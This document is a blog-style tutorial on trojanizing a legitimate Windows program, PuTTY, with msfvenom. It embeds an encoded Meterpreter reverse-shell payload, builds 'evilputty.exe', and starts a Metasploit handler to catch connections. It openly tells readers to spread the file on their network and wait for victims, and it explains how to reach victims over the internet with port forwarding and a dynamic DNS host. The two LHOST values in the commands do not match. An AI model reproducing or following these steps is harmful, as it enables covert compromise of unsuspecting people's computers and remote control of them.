Today, we’re going to create windows executable backdoor using Metasploit Exploitation Framework’s using msfvenom.

How To Backdoor Windows Executables Using Metasploit

First make sure Metasploit is already installed.

If you’re using Mac/Linux you can install Metasploit by using this method. If you’re using Kali Linux then Metasploit is pre-installed on it.

For LAN/Wifi Networks:

Now follow me step by step:

Attacker’s IP: 192.168.1.2
Victim’s IP: 192.168.1.x (within LAN network it might be any IP)

1- Open terminal and download putty using wget.

wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=5555 > evilputty.exe

Above command will generate an EXE file with the name evilputty.exe. This is our backdoored executable file.

3- Start metasploit.

msfconsole

4- Start metasploit’s reverse handler to get a reverse connection.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 5555
exploit

5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilputty.exe , you will get a reverse shell on your metasploit’s handler. Happy Hacking 🙂

For WAN Or Internet:

To use this method over WAN/Internet, you need to forward your ports. Incase you’re wondering how to port forward here’s how to do it.

Follow my following tutorial for better understanding of metasploit’s working over internet.

If you successfully port forwarded and open your port.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=”YOUR PUBLIC IP ADDRESS” LPORT=5555 > evilputty.exe

You’re public ip address might not be static so in that case you should be using NO-IP DNS to get a static address.

Simple write your NO-IP Host in LHOST=example.noip.com

If you have any questions related to port forwarding or attacking in WAN Network please don’t forget to comment below!